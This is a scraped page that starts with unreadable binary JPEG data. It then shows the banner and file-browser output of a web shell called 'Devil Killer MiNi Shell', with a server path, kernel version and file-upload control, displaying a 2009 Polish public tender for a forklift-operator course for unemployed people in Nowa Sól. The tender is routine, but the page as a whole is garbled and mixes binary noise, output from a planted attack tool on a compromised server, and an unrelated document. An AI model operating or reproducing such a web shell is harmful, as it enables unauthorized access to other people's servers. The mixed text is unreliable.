JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090507/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090507/136504-N-2009.html

<p class="kh_header"><b>Nowa Sól: Usługa szkolenia w zakresie przeprowadzenia kursu dla 15 osób bezrobotnych pn.:
/Kierowca wózków jezdniowych podnośnikowych z napędem silnikowym/</b><br>
<b>Numer ogłoszenia: 136504 - 2009; data zamieszczenia: 07.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Nowej Soli , ul. Staszica 1C, 67-100 Nowa Sól, woj. lubuskie, tel. 0-68 3873242, faks 0-68 3873242.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pup.nowasol.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa szkolenia w zakresie przeprowadzenia kursu dla 15 osób bezrobotnych pn.:
/Kierowca wózków jezdniowych podnośnikowych z napędem silnikowym/.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Kategoria według Słownika Zamówień (CPV): 80530000-8 usługi szkolenia zawodowego.
2.	Przedmiotem zamówienia jest usługa szkolenia w zakresie przeprowadzenia kursu dla 15 osób bezrobotnych pn.: /Kierowca wózków jezdniowych podnośnikowych z napędem silnikowym/. Szkolenie jest usługą planowaną, organizowaną ze względu na potrzeby rynku pracy.
3.	Szkoleniem zostaną objęte osoby bezrobotne z różnym poziomem wykształcenia w tym również z podstawowym. Uczestnikami kursu będą osoby skierowane przez Powiatowy Urząd Pracy w Nowej Soli posiadające zdolność do uczestniczenia w szkoleniu, potwierdzoną zaświadczeniem lekarskim.
4.	Szkolenie ma na celu przygotowanie uczestnika do wykonywania pracy na stanowisku: kierowca wózków jezdniowych podnośnikowych z napędem silnikowym. Uczestnicy szkolenia powinni nabyć umiejętności operatora wózków jezdniowych podnośnikowych 
z napędem silnikowym, mających na celu uzyskanie uprawnień z Urzędu Dozoru Technicznego (egzamin zewnętrzny).
5.	Miejsce przeprowadzenia szkolenia - miasto Nowa Sól, dopuszcza się możliwość innego miejsca szkolenia niż miasto Nowa Sól, jednak w takim przypadku koszty dowozu lub dojazdu uczestników szkolenia z miejscowości Nowa Sól do miejsca odbywania szkolenia jak również koszty zakwaterowania i wyżywienia - jeśli takie wystąpią - ponosi w całości jednostka szkoląca.
6.	Wykonawca ubezpieczy uczestników kursu na czas jego trwania od następstw nieszczęśliwych wypadków. Ubezpieczenie ma obejmować wypadki powstałe w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem. Wysokość składki ma odpowiadać sumie ubezpieczenia NNW nie mniejszej niż 10 000,00 zł. na jednego uczestnika szkolenia.
7.	Szkolenie ma obejmować zakres wiadomości teoretycznych i umiejętności praktycznych.
8.	Szkolenie ma być przeprowadzone według programu opracowanego lub zatwierdzonego przez jednostkę organizacyjną wyznaczoną przez ministra właściwego do spraw gospodarki zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002 roku w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz. U. Nr 70, poz. 650) i późniejszymi zmianami tj. Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 04 kwietnia 2003 roku zmieniające rozporządzenie w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz. U. Nr 65, poz. 603) :
8.1	Wymagania takie spełnia Ramowy program nauczania (tabela poniżej) wg Ośrodka Doskonalenia Kadr w Mysłowicach nadzorowany przez Ministra Właściwego ds. Gospodarki, który znajduje się na stronie internetowej ODK w Mysłowicach: http://www.odkmgip.pl/mont/welcome.html , http://www.odkmgip.pl/wozki/Ramowy_program_nauczania_-_wozki.html /.

Ramowy program nauczania
UWAGA!
Ramowy program szkolenia służy jedynie celom informacyjnym dla jednostek kontroli, organizatorów przetargów oraz firm szkoleniowych posiadających legalny program.

Lp.	Tematyka szkolenia	Liczba godzin teorii	Liczba godzin ćwiczeń
1	Typy stosowanych wózków jezdniowych	4	-
2	Budowa wózka	8	-
3	Czynności kierowcy przy obsłudze wózków przed podjęciem pracy i po pracy wózkami	8	-
4	Czynności kierowcy w czasie pracy wózkami	8	-
5	Wiadomości z zakresu ładunkoznawstwa	4	-
6	Wiadomości z zakresu BHP	8	-
7	Praktyczna nauka jazdy	-	15
8	Wiadomości o dozorze technicznym	4	-
RAZEM:	44	15

Podana liczba 15 godzin (zajęcia praktyczne) jest liczbą minimalnego czasu szkolenia dla każdego uczestnika kursu. W procesie szkolenia praktycznego należy stosować co najmniej dwa rodzaje wózków, w tym jezdniowy wózek podnośnikowy. Praktyczna naukę jazdy należy prowadzić w grupach nie większych niż 3 osoby. Czas szkolenia dla grupy trzech osób można liczyć jednocześnie dla wszystkich trzech uczestników, pod warunkiem, iż osoby aktualnie niejeżdżące wózkiem, obserwują wykonywane manewry, odnotowując popełnione błędy.

Program przewiduje obowiązkowo badania lekarskie i psychologiczne dla kandydatów.

8.2	Wykonawca opracowując program szkolenia dodatkowo musi uwzględnić i określić w programie zakres tematyki szkolenia dotyczący wózków jezdniowych z napędem silnikowym zasilanym gazem zgodnie z § 4 ust 3 i 4 ww. rozporządzenia.
9.	Szkolenie ma obejmować ogółem 68 godzin lekcyjnych (w tym 1 godzina na egzamin wewnętrzny) oraz dodatkowo czas przeznaczony na egzamin zewnętrzny UDT - przypadających na jednego uczestnika szkolenia. Przez godzinę lekcyjną należy rozumieć 45 minut zajęć.
10.	Kurs musi być realizowany przeciętnie nie mniej niż 30 godzin zegarowych 
w tygodniu zgodnie z art. 40 ust. 4 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity z 2008 roku Dz. U. Nr 69, poz. 415 z późniejszymi zmianami).
Czas realizacji jest to faktyczny czas przebywania uczestnika szkolenia na zajęciach w godzinach zegarowych tj. od godziny rozpoczęcia do godziny ich zakończenia łącznie z czasem przeznaczonym na przerwy. Długość i ilość przerw może być ustalana według uznania jednostki szkolącej, jednakże łączny czas przerw w danym dniu nie może przekroczyć iloczynu ilości godzin lekcyjnych i 15 minut czasu przeznaczonego na przerwę.
11.	Dzienna ilość godzin nie może przekroczyć 8 godzin zegarowych. Kurs nie może odbywać się w niedzielę i święta.
12.	Wykonawca zapewni wszystkim uczestnikom kursu materiały szkoleniowe. Każdy uczestnik ma otrzymać na własność literaturę wspomagającą tematykę szkolenia w formie książki wspomagającej obsługę wózka jezdniowego (zgodnie z prawem autorskim), materiały do robienia notatek (np. zeszyt i długopis).
13.	Jednostka szkoląca zapewni wszystkim uczestnikom szkolenia napoje (zimne i ciepłe) oraz poczęstunek.
14.	Wykonawca będzie prowadził nadzór wewnętrzny nad szkoleniem służący podnoszeniu jakości prowadzonego szkolenia.
15.	Wykonawca będzie sprawdzał efekty szkolenia na poszczególnych etapach szkolenia wybranymi przez siebie metodami, w tym poprzez egzamin końcowy.
16.	Wykonawca przeprowadzi kurs zgodnie z opracowanym i przedstawionym programem szkolenia, który należy sporządzić wg załącznika nr 1B do SIWZ i który ma zawierać: 
1)	nazwę i zakres szkolenia,
2)	ogólną liczbę godzin wraz z egzaminem końcowym przypadających na jednego uczestnika szkolenia - z podziałem na: godziny teoretyczne, godziny praktyczne i czas przewidywany na egzaminy końcowe (egzamin wewnętrzny i zewnętrzny),
3) czas trwania dla całej 15-osobowej grupy (od dnia rozpoczęcia do dnia zakończenia wraz z egzaminem wewnętrznym i zewnętrznym, podany w zaokrągleniu do pełnych tygodni) i sposób organizacji szkolenia. Sposób organizacji szkolenia należy opisać ze szczególnym uwzględnieniem sposobu realizacji zamówienia dot. zajęć praktycznych z zakresu nauki jazdy.
4)	wymagania wstępne dla uczestników szkolenia (z uwzględnieniem pkt 3),
5)	cele szkolenia (z uwzględnieniem pkt 4),
6)	plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i części praktycznej i czasu przewidzianego na egzaminy końcowe,
7)	treści szkolenia w zakresie poszczególnych zajęć edukacyjnych określonych w pkt 8 ,
8)	wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych do realizacji przedstawionego programu,
9)	wykaz wszystkich materiałów szkoleniowych które otrzyma na własność każdy uczestnik kursu jak w pkt. 12 (przy literaturze należy podać wydawnictwo, tytuł, autor).
10)	sposób sprawdzania efektów szkolenia.
17.	Uczestnicy szkolenia powinni otrzymać:
17.1	Zaświadczenie potwierdzające ukończenie szkolenia wydane przez instytucję szkoleniową. Z zaświadczenia ma wynikać, że uczestnicy szkolenia zdobyli informacje o bezpiecznej wymianie butli gazowej w wózkach jezdniowych podnośnikowych z napędem silnikowym zasilanych gazem.
17.2	Zaświadczenie z Urzędu Dozoru Technicznego uprawniające do obsługi wózków jezdniowych podnośnikowych z napędem silnikowym.
17.3	Certyfikat będący odpowiednikiem uprawnień Urzędu Dozoru Technicznego przetłumaczony na język angielski.
18.	Instytucja szkoleniowa wydaje zaświadczenie wskazane w pkt. 17.1:
18.1	w przypadku, gdy instytucja szkoleniowa stosuje Rozporządzenie Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216) instytucja ta po zakończeniu szkolenia wydaje uczestnikom zaświadczenie zgodne z § 6 ww. rozporządzenia;
18.2	pozostałe instytucje, po zakończeniu szkolenia, wydają uczestnikom zaświadczenie, które w swojej treści ma zawierać minimum niżej wymienione elementy:
a)	pieczęć organizatora kształcenia;
b)	personalne dane osoby, która szkolenie ukończyła (imię, nazwisko, data i miejsce urodzenia);
c)	nazwę formy kształcenia,
d)	nazwę organizatora szkolenia;
e)	termin realizacji szkolenia;
f)	cel szkolenia;
g)	miejscowość i data wydania zaświadczenia;
h)	podpis i pieczęć osoby upoważnionej przez organizatora szkolenia do wydania zaświadczenia;
i)	nazwę zajęć edukacyjnych oraz wymiar ich godzin.
Wykonawca zobowiązany jest przedstawić wraz z ofertą wzór zaświadczenia, jakie zostanie wydane uczestnikom - wzór zaświadczenia będzie stanowić załącznik nr 1 do umowy.
19.	Egzamin zewnętrzny przed komisją UDT musi być przeprowadzony w ostatnim dniu szkolenia. Uczestnicy szkolenia po pozytywnym wyniku egzaminu mają otrzymać zaświadczenie z Urzędu Dozoru Technicznego wskazane w pkt 17.2, uprawniające do obsługi wózków jezdniowych. Wykonawca zobowiązany jest przedstawić wraz z ofertą wzór zaświadczenia UDT (dopuszcza się kserokopię) - wzór zaświadczenia będzie stanowić załącznik nr 2 do umowy.
20.	Uczestnicy szkolenia powinni dodatkowo otrzymać certyfikat wskazany w pkt 17.3 - wzór certyfikatu stanowi załącznik nr 3 do umowy.
21.	Wykonawca ma obowiązek zapewnienia warunków pracy zgodnie z przepisami bezpieczeństwa i higieny pracy w trakcie trwania szkolenia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1	Spełniają warunki określone w art. 22 ust. 1 i nie podlegają wykluczeniu z art. 24 ust 1 i 2 ustawy - Prawo Zamówień Publicznych,
1.1.1	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
1.1.2	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
1.1.3	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.1.4	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29.01.2004 r. - Prawo zamówień publicznych.
1.2	Posiadają wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej zgodnie z art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity z 2008 roku Dz. U. Nr 69, poz. 415 z późniejszymi zmianami).
1.3	Dysponują lub będą dysponować kadrą dydaktyczną o odpowiednich kwalifikacjach, doświadczeniu zawodowym i wykształceniu w zakresie tematyki kursu oraz co najmniej jedna z tych osób w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia - uczestniczyła w realizacji kursu grupowego w pozaszkolnej formie kształcenia jako wykładowca, dla co najmniej 10 osób 
o tematyce przedmiotu zamówienia tj.: /kierowca wózków jezdniowych/.
1.4	Dysponują lub będą dysponować odpowiednim lokalem do zajęć teoretycznych zapewniającym samodzielne stanowiska dla co najmniej 15-osobowej grupy 
i odpowiednim placem manewrowym do zajęć praktycznych oraz sprzętem 
i wyposażeniem technicznym niezbędnym do wykonania zamówienia w tym wózki jezdniowe z napędem silnikowym zasilane między innymi gazem.
1.5	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku ubiegania się o wspólne zamówienie:
1.5.1	Wykonawcy ustanawiają pełnomocnika do reprezentowania ich 
w postępowaniu o udzielenie zamówienia,
1.5.2	każdy z Wykonawców osobno powinien spełniać warunki formalne, które dotyczą Wykonawców, a wynikają z przepisów prawa i są określone 
w ogłoszeniu o zamówieniu i części IV pkt 3.2 SIWZ.
2	Na potwierdzenie spełniania warunków udziału w postępowaniu wskazanych w punkcie 1 Wykonawca składa dokumenty i oświadczenia.
2.1	W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz, że nie podlega wykluczeniu na podstawie art. 24 ust 1 i 2 ustawy PZP - Wykonawca przedstawi:
2.1.1	oświadczenie o spełnianiu przez Wykonawcę warunków określonych w art. 22 ust 1 i o nie podleganiu wykluczeniu z art. 24 ust 1 i 2 ustawy PZP - wg załącznika nr 2 do SIWZ,
2.1.2	aktualny odpis z właściwego rejestru, albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 m-cy przed upływem terminu do składania ofert.
2.2	W celu potwierdzenia, że Wykonawca posiada wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej zgodnie z art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity z 2008 roku Dz. U. Nr 69, poz. 415 z późniejszymi zmianami) - Wykonawca przedstawi:
2.2.1	aktualne  na rok 2009 potwierdzenie wpisu do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej lub wydruk z rejestru elektronicznego udostępniony na stronie internetowej http://ris.praca.gov.pl potwierdzający wpis do Rejestru Instytucji Szkoleniowych (formatka danych instytucji w rejestrze).Przez aktualne rozumie się zaświadczenie wydane przez WUP w roku 2009 lub zaświadczenie wydane w latach ubiegłych potwierdzone przez WUP w roku 2009 lub wydruk ze strony internetowej potwierdzający kontynuację prowadzenia działalności w roku 2009.
2.3	Na potwierdzenie, że Wykonawca dysponuje lub będzie dysponować osobami zdolnymi do wykonania zamówienia - Wykonawca przedstawi :
2.3.1	wykaz kadry dydaktycznej, którą dysponuje lub będzie dysponował wykonawca i która będzie uczestniczyć w  wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nich czynności, gdzie wykonawca wykaże, że co najmniej jedna z wskazanych osób w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia - uczestniczyła w realizacji kursu grupowego w pozaszkolnej formie kształcenia jako wykładowca, dla co najmniej 10 osób o tematyce przedmiotu zamówienia tj. /Kierowca wózków jezdniowych/ - wg załącznika nr 3 do SIWZ. W przypadku jeśli wykonawca w wykazie kadry wskaże osoby którymi będzie dysponował wówczas musi dodatkowo złożyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
2.4	Na potwierdzenie, że Wykonawca dysponuje lub będzie dysponować odpowiednim lokalem, placem manewrowym, sprzętem i wyposażeniem technicznym niezbędnym do wykonania zamówienia - Wykonawca przedstawi:
2.4.1	wskazanie adresów: lokalu do zajęć teoretycznych i placu manewrowego oraz wykaz sprzętu i wyposażenia technicznego niezbędnego do wykonania zamówienia, którymi dysponuje lub będzie dysponował wykonawca - wg załącznika nr 4 do SIWZ.
Z dokumentu ma wynikać, że Wykonawca zapewnia samodzielne stanowiska dla co najmniej 15-osobowej grupy przy realizacji zajęć teoretycznych 
i odpowiednim miejscem do zajęć praktycznych - plac manewrowy (przy uwzględnieniu przez Zamawiającego sposobu realizacji zajęć praktycznych), oraz że Wykonawca spełnia warunek dysponowania wózkami jezdniowymi o napędzie silnikowym zasilanymi między innymi gazem. Dodatkowo do załącznika należy dołączyć dokumenty potwierdzające, że jednostka szkoląca dysponuje wskazanym lokalem, placem manewrowym oraz wózkami jezdniowymi na czas przeprowadzenia kursu (potwierdzenie najmu, rezerwacji, użyczenia) lub w przypadku gdy wykonawca będzie dysponował należy dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia.
3	Dokumenty wymagane w przypadku składania oferty wspólnej:
3.1	dokument wskazujący pełnomocnika do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie zamówienia. Z dokumentu ma również wynikać jakie firmy będzie reprezentować pełnomocnik i która z firm jest liderem,
3.2	każdy z Wykonawców składa osobno dokumenty i oświadczenia o których mowa w pkt 2.1.1, 2.1.2 oraz 2.2.1 . Natomiast dokumenty o których mowa w pkt 2.3.1 i 2.4.1 Wykonawcy składają wspólnie.
4	Zamawiający będzie dokonywał oceny spełnienia warunków na podstawie złożonych oświadczeń i dokumentów potwierdzających ich spełnienie zgodnie z formułą /spełnia/nie spełnia/, nie spełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania, z zastrzeżeniem art. 26 ust 3 ustawy PZP..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypełniony formularz ofertowy z podaniem ceny na całość zamówienia - wg załącznika nr 1 do SIWZ.
Do formularza ofertowego należy dołączyć:
1.1	Kosztorys szkolenia - wg załącznika nr 1A do SIWZ,
1.2	Opracowany szczegółowy program szkolenia który w swojej treści ma być zgodny z zapisem w pkt 8-10 część II SIWZ, oraz zawierać wszystkie informacje zawarte we wzorze programu szkolenia, który stanowi załącznik nr 1B do SIWZ.
1.3	Wzór zaświadczenia potwierdzającego ukończenie szkolenia wydane przez instytucję szkoleniową - zgodnie z zapisem w części II SIWZ pkt 18.1 lub 18.2
1.4	Wzór zaświadczenia Urzędu Dozoru Technicznego, które otrzyma absolwent szkolenia po pozytywnym wyniku egzaminu - zgodnie z zapisem w części II SIWZ pkt 19.
2.	Oświadczenie o spełnieniu przez Wykonawcę warunków określonych w art. 22 ust. 1
i o nie podleganiu wykluczeniu z art. 24 ust 1 i 2 ustawy - Prawo Zamówień Publicznych - wg załącznika nr 2 do specyfikacji.
3.	Aktualny odpis z właściwego rejestru, albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 m-cy przed upływem terminu do składania ofert.
4.	Potwierdzenie wpisu do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej zgodnie z art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity z 2008 roku Dz. U. Nr 69, poz. 415 z późniejszymi zmianami) - zgodnie z zapisem w części IV SIWZ ppkt 2.2.1.
5.	Wykaz kadry dydaktycznej, która będzie uczestniczyć w realizacji kursu o tematyce przedmiotu zamówienia jako wykładowca, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nich czynności gdzie wykonawca wykaże, że co najmniej jedna z wskazanych osób w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia - uczestniczyła w realizacji kursu grupowego w pozaszkolnej formie kształcenia jako wykładowca, dla co najmniej 10 osób o tematyce przedmiotu zamówienia tj.: /Kierowca wózków jezdniowych/ - wg załącznika nr 3 do SIWZ. W przypadku jeśli wykonawca w wykazie kadry wskaże osoby którymi będzie dysponował wówczas musi dodatkowo złożyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
6.	Wskazanie lokalu do zajęć teoretyczne i placu manewrowego do zajęć praktycznych oraz wykaz sprzętu i wyposażenia technicznego niezbędnego do wykonania zamówienia, którymi dysponuje lub będzie dysponował wykonawca - wg załącznika nr 4 do SIWZ.
Z dokumentu ma wynikać, że Wykonawca zapewnia samodzielne stanowiska dla co najmniej 15-osobowej grupy do realizacji zajęć teoretycznych i odpowiednim miejscem do zajęć praktycznych - plac manewrowy (przy uwzględnieniu przez Zamawiającego sposobu realizacji zajęć praktycznych) oraz że Wykonawca spełnia warunek dysponowania wózkami jezdniowymi o napędzie silnikowym zasilane między innymi gazem. Dodatkowo do załącznika należy dołączyć dokumenty potwierdzające, że jednostka szkoląca dysponuje wskazanym lokalem, placem manewrowym oraz wózkami jezdniowymi na czas przeprowadzenia kursu (potwierdzenie najmu, rezerwacji, użyczenia) lub w przypadku gdy wykonawca będzie dysponował należy dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia.
7.	Oryginalne pełnomocnictwo lub odpis pełnomocnictwa poświadczony notarialnie dokument ma potwierdzać uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.
8.	Dokumenty wymagane w przypadku składania oferty wspólnej.
1.	Wskazanie pełnomocnika do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie zamówienia. Z dokumentu ma również wynikać jakie firmy będzie reprezentować pełnomocnik i która z firm jest liderem.
